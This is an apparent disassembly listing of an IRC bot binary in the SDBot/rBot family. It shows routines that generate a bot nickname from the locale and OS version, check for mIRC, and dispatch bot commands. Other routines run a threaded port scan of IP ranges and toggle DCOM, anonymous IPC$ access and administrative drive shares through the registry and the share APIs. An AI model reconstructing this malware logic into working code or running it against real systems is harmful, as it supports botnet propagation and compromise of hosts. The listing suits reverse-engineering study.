cmp dword_42AE60, esi
jle short loc_40E5A9
loc_40E583: ; CODE XREF: .text:0040E5A7�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E583
loc_40E5A9: ; CODE XREF: .text:0040E581�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call ds:dword_41F0F4 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_1 ; "%s"
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 10h
cmp dword_42AE60, esi
jle short loc_40E61E
loc_40E5F8: ; CODE XREF: .text:0040E61C�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E5F8
loc_40E61E: ; CODE XREF: .text:0040E5F6�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-74h]
sub esp, 94h
push esi
push edi
lea eax, [ebp-20h]
push eax
mov esi, 41FA76h
mov dword ptr [ebp-20h], 94h
call ds:dword_41F0F8 ; GetVersionExA
call ds:dword_41F004 ; GetTickCount
push eax
call sub_412D64
cmp dword ptr [ebp-1Ch], 4
pop ecx
jnz short loc_40E692
cmp dword ptr [ebp-18h], 0
jnz short loc_40E678
cmp dword ptr [ebp-10h], 1
jnz short loc_40E66B
mov esi, offset a95 ; "95"
loc_40E66B: ; CODE XREF: .text:0040E664�j
cmp dword ptr [ebp-10h], 2
jnz short loc_40E6C2
mov esi, offset aNt ; "NT"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E678: ; CODE XREF: .text:0040E65E�j
cmp dword ptr [ebp-18h], 0Ah
jnz short loc_40E685
mov esi, offset a98 ; "98"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E685: ; CODE XREF: .text:0040E67C�j
cmp dword ptr [ebp-18h], 5Ah
jnz short loc_40E6BD
mov esi, offset aMe_0 ; "ME"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E692: ; CODE XREF: .text:0040E658�j
cmp dword ptr [ebp-1Ch], 5
jnz short loc_40E6BD
cmp dword ptr [ebp-18h], 0
jnz short loc_40E6A5
mov esi, offset a2k ; "2K"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E6A5: ; CODE XREF: .text:0040E69C�j
cmp dword ptr [ebp-18h], 1
jnz short loc_40E6B2
mov esi, offset aXp_0 ; "XP"
jmp short loc_40E6C2
; ---------------------------------------------------------------------------
loc_40E6B2: ; CODE XREF: .text:0040E6A9�j
cmp dword ptr [ebp-18h], 2
mov esi, offset a2k3 ; "2K3"
jz short loc_40E6C2
loc_40E6BD: ; CODE XREF: .text:0040E689�j
; .text:0040E696�j
mov esi, offset a??? ; "???"
loc_40E6C2: ; CODE XREF: .text:0040E66F�j
; .text:0040E676�j ...
mov edi, [ebp+7Ch]
push esi
push offset aS_5 ; "[%s]"
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 10h
cmp dword_42AE60, esi
jle short loc_40E706
loc_40E6E0: ; CODE XREF: .text:0040E704�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E6E0
loc_40E706: ; CODE XREF: .text:0040E6DE�j
mov eax, edi
pop edi
pop esi
add ebp, 74h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E70F proc near ; CODE XREF: sub_40E7B0+80�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_41F004 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
call dword_4334F8 ; FindWindowA
test esi, esi
jbe short loc_40E75D
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40E746
mov eax, 41FA76h
loc_40E746: ; CODE XREF: sub_40E70F+30�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_412E0D
add esp, 14h
jmp short loc_40E777
; ---------------------------------------------------------------------------
loc_40E75D: ; CODE XREF: sub_40E70F+27�j
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40E76B
mov eax, 41FA76h
loc_40E76B: ; CODE XREF: sub_40E70F+55�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40E777: ; CODE XREF: sub_40E70F+4C�j
lea eax, [ebp+var_1C]
lea edx, [eax+1]
pop esi
loc_40E77E: ; CODE XREF: sub_40E70F+74�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40E77E
sub eax, edx
cmp eax, 2
jbe short loc_40E7AB
push 1Ch
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
call sub_412A80
push 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_412C40
add esp, 18h
loc_40E7AB: ; CODE XREF: sub_40E70F+7B�j
mov eax, [ebp+arg_0]
leave
retn
sub_40E70F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E7B0 proc near ; CODE XREF: sub_40751F+53�p
; sub_40779B+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor edx, edx
xor edi, edi
loc_40E7BA: ; CODE XREF: sub_40E7B0+62�j
mov esi, [ebp+arg_C]
test esi, esi
jz short loc_40E7F9
lea eax, dword_42B288[edi]
loc_40E7C7: ; CODE XREF: sub_40E7B0+33�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_40E7E9
test cl, cl
jz short loc_40E7E5
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_40E7E9
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_40E7C7
loc_40E7E5: ; CODE XREF: sub_40E7B0+21�j
xor eax, eax
jmp short loc_40E7EE
; ---------------------------------------------------------------------------
loc_40E7E9: ; CODE XREF: sub_40E7B0+1D�j
; sub_40E7B0+2B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40E7EE: ; CODE XREF: sub_40E7B0+37�j
xor ecx, ecx
test eax, eax
setz cl
mov eax, ecx
jmp short loc_40E807
; ---------------------------------------------------------------------------
loc_40E7F9: ; CODE XREF: sub_40E7B0+F�j
mov ecx, dword_42B294[edi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40E807: ; CODE XREF: sub_40E7B0+47�j
test eax, eax
jnz short loc_40E816
add edi, 14h
inc edx
cmp edi, 64h
jb short loc_40E7BA
jmp short loc_40E824
; ---------------------------------------------------------------------------
loc_40E816: ; CODE XREF: sub_40E7B0+59�j
push [ebp+arg_0]
lea eax, [edx+edx*4]
call off_42B298[eax*4]
pop ecx
loc_40E824: ; CODE XREF: sub_40E7B0+64�j
cmp [ebp+arg_8], 0
pop edi
pop esi
pop ebx
jz short loc_40E838
push [ebp+arg_0]
call sub_40E70F
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40E838: ; CODE XREF: sub_40E7B0+7B�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40E7B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40E83D proc near ; DATA XREF: sub_40E8FF+77�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0B8h
mov eax, [ebp+74h+arg_0]
push esi
push edi
mov esi, eax
push 2Ah
pop ecx
lea edi, [ebp+74h+var_B8]
rep movsd
push [ebp+74h+var_34]
xor esi, esi
inc esi
mov [eax+0A4h], esi
xor eax, eax
lea edi, [ebp+74h+var_10]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_10], 2
call dword_4335EC ; ntohs
push 6
mov [ebp+74h+var_E], ax
mov eax, [ebp+74h+var_28]
push esi
push 2
mov [ebp+74h+var_C], eax
call dword_4334A0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40E8ED
push 10h
lea eax, [ebp+74h+var_10]
push eax
push esi
call dword_433458 ; connect
mov ecx, [ebp+74h+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_434344[ecx], esi
jz short loc_40E8ED
push [ebp+74h+var_34]
push [ebp+74h+var_28]
call dword_433520 ; inet_ntoa
push eax
push offset aScanIpSPortD_0 ; "[SCAN]: IP: %s Port: %d is open."
mov edi, offset dword_479C18
push edi
call sub_412BB5
push 0
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_B4]
push edi
push eax
push [ebp+74h+var_B8]
call sub_4045DD
push edi
call sub_401C33
add esp, 28h
loc_40E8ED: ; CODE XREF: sub_40E83D+55�j
; sub_40E83D+76�j
push esi
call dword_4335AC ; closesocket
pop edi
xor eax, eax
pop esi
add ebp, 74h
leave
retn 4
sub_40E83D endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_40E8FF proc near ; DATA XREF: sub_4078FA+25BA�o
var_12C = byte ptr -12Ch
var_AC = byte ptr -0ACh
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 12Ch
push ebx
mov ebx, [ebp+74h+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, ebx
lea edi, [ebp+74h+var_AC]
rep movsd
mov esi, ds:dword_41F000
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_40E92C: ; CODE XREF: sub_40E8FF+C1�j
push [ebp+74h+var_28]
push [ebp+74h+var_1C]
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_12C]
push offset aScanScanningIp ; "[SCAN]: Scanning IP: %s, Port: %d."
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+74h+var_12C]
push eax
mov eax, [ebp+74h+var_20]
imul eax, 234h
add eax, offset dword_434138
push eax
call sub_412C40
add esp, 1Ch
lea eax, [ebp+74h+var_4]
push eax
push edi
lea eax, [ebp+74h+var_AC]
push eax
push offset sub_40E83D
push edi
push edi
call ds:dword_41F00C ; CreateThread
cmp eax, edi
mov [ebp+74h+arg_0], eax
jz short loc_40E995
jmp short loc_40E990
; ---------------------------------------------------------------------------
loc_40E98C: ; CODE XREF: sub_40E8FF+94�j
push 32h
call esi ; Sleep
loc_40E990: ; CODE XREF: sub_40E8FF+8B�j
cmp [ebp+74h+var_8], edi
jz short loc_40E98C
loc_40E995: ; CODE XREF: sub_40E8FF+89�j
push [ebp+74h+arg_0]
call ds:dword_41F034 ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
push [ebp+74h+var_1C]
call dword_433570 ; ntohl
inc eax
push eax
call dword_4335C4 ; ntohl
mov [ebp+74h+var_1C], eax
jmp loc_40E92C
sub_40E8FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C5 proc near ; CODE XREF: sub_40F005+8�p
; sub_40F023+37�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_433600, edi
jnz loc_40EAF8
lea eax, [ebp+var_4]
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_4335C8 ; RegOpenKeyExA
test eax, eax
jnz short loc_40EA51
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 4Eh
lea edx, [eax+1]
loc_40EA09: ; CODE XREF: sub_40E9C5+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40EA09
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_433484 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_40EA39
push offset aSecureDisableD ; "[SECURE]: Disable DCOM failed."
jmp short loc_40EA3E
; ---------------------------------------------------------------------------
loc_40EA39: ; CODE XREF: sub_40E9C5+6B�j
push offset aSecureDcomDisa ; "[SECURE]: DCOM disabled."
loc_40EA3E: ; CODE XREF: sub_40E9C5+72�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C ; RegCloseKey
jmp short loc_40EA64
; ---------------------------------------------------------------------------
loc_40EA51: ; CODE XREF: sub_40E9C5+36�j
lea eax, [ebp+var_214]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EA64: ; CODE XREF: sub_40E9C5+8A�j
cmp [ebp+arg_C], edi
jnz short loc_40EA83
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EA83: ; CODE XREF: sub_40E9C5+A2�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4335C8 ; RegOpenKeyExA
test eax, eax
jnz short loc_40EAF1
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_433484 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_214]
jz short loc_40EAD9
push offset aSecureFailed_1 ; "[SECURE]: Failed to restrict access to "...
jmp short loc_40EADE
; ---------------------------------------------------------------------------
loc_40EAD9: ; CODE XREF: sub_40E9C5+10B�j
push offset aSecureRestrict ; "[SECURE]: Restricted access to the IPC$"...
loc_40EADE: ; CODE XREF: sub_40E9C5+112�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C ; RegCloseKey
jmp short loc_40EB0B
; ---------------------------------------------------------------------------
loc_40EAF1: ; CODE XREF: sub_40E9C5+E3�j
push offset aSecureFailed_2 ; "[SECURE]: Failed to open IPC$ Restricti"...
jmp short loc_40EAFD
; ---------------------------------------------------------------------------
loc_40EAF8: ; CODE XREF: sub_40E9C5+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_40EAFD: ; CODE XREF: sub_40E9C5+131�j
lea eax, [ebp+var_214]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EB0B: ; CODE XREF: sub_40E9C5+12A�j
cmp [ebp+arg_C], edi
jnz short loc_40EB2A
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EB2A: ; CODE XREF: sub_40E9C5+149�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
cmp dword_433628, edi
pop ecx
jnz loc_40ECA7
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
push ebx
loc_40EB4D: ; CODE XREF: sub_40E9C5+2C6�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push edi
call dword_4335A0
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_40EBEC
cmp eax, 0EAh
jz short loc_40EBEC
xor esi, esi
loc_40EB7B: ; CODE XREF: sub_40E9C5+220�j
push off_42B2F0[esi]
push edi
call sub_406032
pop ecx
pop ecx
push off_42B2F0[esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_40EBA0
push offset aSecureShareSDe ; "[SECURE]: Share '%s' deleted."
jmp short loc_40EBA5
; ---------------------------------------------------------------------------
loc_40EBA0: ; CODE XREF: sub_40E9C5+1D2�j
push offset aSecureFailed_3 ; "[SECURE]: Failed to delete '%s' share."
loc_40EBA5: ; CODE XREF: sub_40E9C5+1D9�j
push 200h
push eax
call sub_412E0D
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_40EBD2
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EBD2: ; CODE XREF: sub_40E9C5+1F1�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
add esi, 8
cmp esi, 20h
pop ecx
jb short loc_40EB7B
jmp loc_40EC84
; ---------------------------------------------------------------------------
loc_40EBEC: ; CODE XREF: sub_40E9C5+1AB�j
; sub_40E9C5+1B2�j
mov esi, [ebp+var_8]
xor ebx, ebx
inc ebx
cmp [ebp+var_4], ebx
jb loc_40EC7B
loc_40EBFB: ; CODE XREF: sub_40E9C5+2B2�j
mov edi, [esi]
push edi
call sub_413FEE
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_40EC70
push edi
call sub_405F46
push eax
push 0
call sub_406032
add esp, 0Ch
push dword ptr [esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_40EC30
push offset aSecureShareS_0 ; "[SECURE]: Share '%S' deleted."
jmp short loc_40EC35
; ---------------------------------------------------------------------------
loc_40EC30: ; CODE XREF: sub_40E9C5+262�j
push offset aSecureFailed_4 ; "[SECURE]: Failed to delete '%S' share."
loc_40EC35: ; CODE XREF: sub_40E9C5+269�j
push 200h
push eax
call sub_412E0D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_40EC63
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EC63: ; CODE XREF: sub_40E9C5+282�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
pop ecx
loc_40EC70: ; CODE XREF: sub_40E9C5+245�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_40EBFB
xor edi, edi
loc_40EC7B: ; CODE XREF: sub_40E9C5+230�j
push [ebp+var_8]
call dword_4334D8
loc_40EC84: ; CODE XREF: sub_40E9C5+222�j
cmp [ebp+var_10], 0EAh
jz loc_40EB4D
lea eax, [ebp+var_214]
push offset aSecureNetworkS ; "[SECURE]: Network shares deleted."
push eax
call sub_412BB5
pop ecx
pop ecx
pop ebx
jmp short loc_40ECBA
; ---------------------------------------------------------------------------
loc_40ECA7: ; CODE XREF: sub_40E9C5+178�j
lea eax, [ebp+var_214]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40ECBA: ; CODE XREF: sub_40E9C5+2E0�j
cmp [ebp+arg_C], edi
jnz short loc_40ECD8
push edi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40ECD8: ; CODE XREF: sub_40E9C5+2F8�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
pop ecx
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_40E9C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECEC proc near ; CODE XREF: sub_40F023:loc_40F061�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_433600, ebx
push esi
jnz loc_40EE1B
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_4335C8 ; RegOpenKeyExA
test eax, eax
jnz short loc_40ED78
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 59h
lea edx, [eax+1]
loc_40ED30: ; CODE XREF: sub_40ECEC+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40ED30
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_433484 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_40ED60
push offset aSecureEnableDc ; "[SECURE]: Enable DCOM failed."
jmp short loc_40ED65
; ---------------------------------------------------------------------------
loc_40ED60: ; CODE XREF: sub_40ECEC+6B�j
push offset aSecureDcomEnab ; "[SECURE]: DCOM enabled."
loc_40ED65: ; CODE XREF: sub_40ECEC+72�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C ; RegCloseKey
jmp short loc_40ED8B
; ---------------------------------------------------------------------------
loc_40ED78: ; CODE XREF: sub_40ECEC+36�j
lea eax, [ebp+var_220]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40ED8B: ; CODE XREF: sub_40ECEC+8A�j
cmp [ebp+arg_C], ebx
jnz short loc_40EDAA
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EDAA: ; CODE XREF: sub_40ECEC+A2�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4335C8 ; RegOpenKeyExA
test eax, eax
jnz short loc_40EE14
push 4
lea eax, [ebp+var_8]
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_433484 ; RegSetValueExA
test eax, eax
lea eax, [ebp+var_220]
jz short loc_40EDFC
push offset aSecureFailed_5 ; "[SECURE]: Failed to unrestrict access t"...
jmp short loc_40EE01
; ---------------------------------------------------------------------------
loc_40EDFC: ; CODE XREF: sub_40ECEC+107�j
push offset aSecureUnrestri ; "[SECURE]: Unrestricted access to the IP"...
loc_40EE01: ; CODE XREF: sub_40ECEC+10E�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C ; RegCloseKey
jmp short loc_40EE2E
; ---------------------------------------------------------------------------
loc_40EE14: ; CODE XREF: sub_40ECEC+E3�j
push offset aSecureFailed_6 ; "[SECURE]: Failed to open IPC$ restricti"...
jmp short loc_40EE20
; ---------------------------------------------------------------------------
loc_40EE1B: ; CODE XREF: sub_40ECEC+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_40EE20: ; CODE XREF: sub_40ECEC+12D�j
lea eax, [ebp+var_220]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EE2E: ; CODE XREF: sub_40ECEC+126�j
cmp [ebp+arg_C], ebx
jnz short loc_40EE4D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EE4D: ; CODE XREF: sub_40ECEC+145�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
cmp dword_433628, ebx
pop ecx
jnz loc_40EFC0
push edi
xor esi, esi
mov edi, 200h
loc_40EE6E: ; CODE XREF: sub_40ECEC+1EF�j
push dword_42B2F4[esi]
push off_42B2F0[esi]
push ebx
call sub_405FC7
add esp, 0Ch
push off_42B2F0[esi]
test eax, eax
lea eax, [ebp+var_220]
jnz short loc_40EE9A
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_40EE9F
; ---------------------------------------------------------------------------
loc_40EE9A: ; CODE XREF: sub_40ECEC+1A5�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_40EE9F: ; CODE XREF: sub_40ECEC+1AC�j
push edi
push eax
call sub_412E0D
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_40EEC8
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EEC8: ; CODE XREF: sub_40ECEC+1C0�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
add esi, 8
cmp esi, 10h
pop ecx
jb short loc_40EE6E
call ds:dword_41F0FC ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_40EFA8
loc_40EEF0: ; CODE XREF: sub_40ECEC+2B6�j
test byte ptr [ebp+var_4], 1
jz loc_40EF9D
cmp bl, 41h
jz loc_40EF9D
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_412E0D
push esi
push offset aC_0 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_412E0D
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_43342C ; GetDriveTypeA
cmp eax, 3
jnz short loc_40EF9D
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_405FC7
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_220]
jnz short loc_40EF61
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_40EF66
; ---------------------------------------------------------------------------
loc_40EF61: ; CODE XREF: sub_40ECEC+26C�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_40EF66: ; CODE XREF: sub_40ECEC+273�j
push edi
push eax
call sub_412E0D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_40EF90
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EF90: ; CODE XREF: sub_40ECEC+288�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
pop ecx
loc_40EF9D: ; CODE XREF: sub_40ECEC+208�j
; sub_40ECEC+211�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_40EEF0
loc_40EFA8: ; CODE XREF: sub_40ECEC+1FE�j
lea eax, [ebp+var_220]
push offset aSecureNetwor_0 ; "[SECURE]: Network shares added."
push eax
call sub_412BB5
pop ecx
pop ecx
xor ebx, ebx
pop edi
jmp short loc_40EFD3
; ---------------------------------------------------------------------------
loc_40EFC0: ; CODE XREF: sub_40ECEC+174�j
lea eax, [ebp+var_220]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EFD3: ; CODE XREF: sub_40ECEC+2D2�j
cmp [ebp+arg_C], ebx
jnz short loc_40EFF1
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EFF1: ; CODE XREF: sub_40ECEC+2EA�j
lea eax, [ebp+var_220]
push eax
call sub_401C33
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
sub_40ECEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40F005 proc near ; CODE XREF: sub_40F005+1C�j
; DATA XREF: sub_40D1EF+3B4�o
push 1
push 0
push 0
push 0
call sub_40E9C5
add esp, 10h
push dword_42B2EC
call ds:dword_41F000 ; Sleep
jmp short sub_40F005
sub_40F005 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F023 proc near ; DATA XREF: sub_4078FA+4A4B�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
cmp [ebp+74h+var_10], 0
push [ebp+74h+var_8]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
jz short loc_40F061
call sub_40E9C5
jmp short loc_40F066
; ---------------------------------------------------------------------------
loc_40F061: ; CODE XREF: sub_40F023+35�j
call sub_40ECEC
loc_40F066: ; CODE XREF: sub_40F023+3C�j
add esp, 10h
push [ebp+74h+var_14]
call sub_4111AE
pop ecx
push 0
